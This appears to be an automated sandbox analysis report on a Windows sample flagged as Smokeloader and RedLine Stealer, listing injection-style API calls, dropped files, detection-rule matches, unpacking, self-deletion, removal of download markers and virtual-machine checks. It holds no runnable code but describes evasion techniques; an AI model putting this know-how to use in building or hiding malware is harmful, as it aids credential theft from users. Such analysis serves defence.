Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,	5_2_0040324F
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,	5_2_00403256
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401557
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,	5_2_0040326C
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,	5_2_00403277
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014FE
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,	5_2_00403290
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00403103 RtlCreateUserThread,NtTerminateProcess,	6_2_00403103
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_004014FB HeapCreate,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004014FB
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401641
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00403257 RtlCreateUserThread,NtTerminateProcess,	6_2_00403257
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401606
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401613
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401627
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015FB
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_00403103 RtlCreateUserThread,NtTerminateProcess,	8_2_00403103
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_004014FB HeapCreate,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004014FB
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401641
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_00403257 RtlCreateUserThread,NtTerminateProcess,	8_2_00403257
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401606
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401613
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401627
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015FB

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_00415B00	0_2_00415B00
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_00415B00	5_2_00415B00
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_004157A0	6_2_004157A0
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_004157A0	8_2_004157A0

Source: wBgwzVbZuV.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: F421.exe.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: rghrbbi.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: wehrbbi.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: wBgwzVbZuV.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2706573032.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2705859376.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.2354367271.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.2354648687.0000000002DA7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2011394897.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2011202402.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: wBgwzVbZuV.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: F421.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rghrbbi.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wehrbbi.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/4@26/3

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe

Code function: 0_2_02DFA8A7 CreateToolhelp32Snapshot,Module32First,

0_2_02DFA8A7

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wehrbbi

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\F421.tmp

Jump to behavior

Source: wBgwzVbZuV.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wBgwzVbZuV.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\wBgwzVbZuV.exe "C:\Users\user\Desktop\wBgwzVbZuV.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wehrbbi C:\Users\user\AppData\Roaming\wehrbbi
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F421.exe C:\Users\user\AppData\Local\Temp\F421.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\rghrbbi C:\Users\user\AppData\Roaming\rghrbbi
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wehrbbi C:\Users\user\AppData\Roaming\wehrbbi
Source: unknown	Process created: C:\Users\user\AppData\Roaming\rghrbbi C:\Users\user\AppData\Roaming\rghrbbi
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F421.exe C:\Users\user\AppData\Local\Temp\F421.exe	Jump to behavior

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	Section loaded: msvcr100.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Unpacked PE file: 0.2.wBgwzVbZuV.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.dejunug:W;.manu:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\wehrbbi	Unpacked PE file: 5.2.wehrbbi.400000.0.unpack .text:ER;.rdata:R;.data:W;.dejunug:W;.manu:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Unpacked PE file: 6.2.F421.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tuje:W;.wekigof:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\rghrbbi	Unpacked PE file: 8.2.rghrbbi.400000.0.unpack .text:ER;.rdata:R;.data:W;.tuje:W;.wekigof:W;.rsrc:R; vs .text:EW;

Source: wBgwzVbZuV.exe	Static PE information: section name: .dejunug
Source: wBgwzVbZuV.exe	Static PE information: section name: .manu
Source: F421.exe.1.dr	Static PE information: section name: .tuje
Source: F421.exe.1.dr	Static PE information: section name: .wekigof
Source: rghrbbi.1.dr	Static PE information: section name: .tuje
Source: rghrbbi.1.dr	Static PE information: section name: .wekigof
Source: wehrbbi.1.dr	Static PE information: section name: .dejunug
Source: wehrbbi.1.dr	Static PE information: section name: .manu

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_02C31540 pushad ; ret	0_2_02C31550
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_02DFC6A3 push B63524ADh; retn 001Fh	0_2_02DFC6DA
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_02DFD1A0 pushfd ; iretd	0_2_02DFD1A1
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_02DFE300 push esp; ret	0_2_02DFE302
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_004014D9 pushad ; ret	5_2_004014E9
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_004031DB push eax; ret	5_2_004032AB
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_02C71540 pushad ; ret	5_2_02C71550
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_02D2E0E8 push esp; ret	5_2_02D2E0EA
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_02D2C48B push B63524ADh; retn 001Fh	5_2_02D2C4C2
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_02D2CF88 pushfd ; iretd	5_2_02D2CF89
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00402842 pushad ; retf F6A4h	6_2_004029D1
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00401065 pushfd ; retf	6_2_0040106A
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00402805 push 21CACAEFh; iretd	6_2_0040280A
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00402511 push ebp; iretd	6_2_00402523
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00403325 push eax; ret	6_2_004033F3
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00403433 pushad ; ret	6_2_004035AB
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00401182 push esp; retf	6_2_0040118E
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_00402A9D pushad ; retf	6_2_00402AAB
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_004012B7 push cs; iretd	6_2_004012B8
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_02CB10CC pushfd ; retf	6_2_02CB10D1
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_02CB11E9 push esp; retf	6_2_02CB11F5
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_02CB286C push 21CACAEFh; iretd	6_2_02CB2871
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_02CB2578 push ebp; iretd	6_2_02CB258A
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_02CB2B04 pushad ; retf	6_2_02CB2B12
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_02CB131E push cs; iretd	6_2_02CB131F
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_00402842 pushad ; retf F6A4h	8_2_004029D1
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_00401065 pushfd ; retf	8_2_0040106A
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_00402805 push 21CACAEFh; iretd	8_2_0040280A
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_00402511 push ebp; iretd	8_2_00402523

Source: wBgwzVbZuV.exe	Static PE information: section name: .text entropy: 7.553501827115452
Source: F421.exe.1.dr	Static PE information: section name: .text entropy: 7.553991384861311
Source: rghrbbi.1.dr	Static PE information: section name: .text entropy: 7.553991384861311
Source: wehrbbi.1.dr	Static PE information: section name: .text entropy: 7.553501827115452

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\rghrbbi	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\wehrbbi	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F421.exe	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\rghrbbi			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\wehrbbi			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\wbgwzvbzuv.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\wehrbbi:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\rghrbbi:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\explorer.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

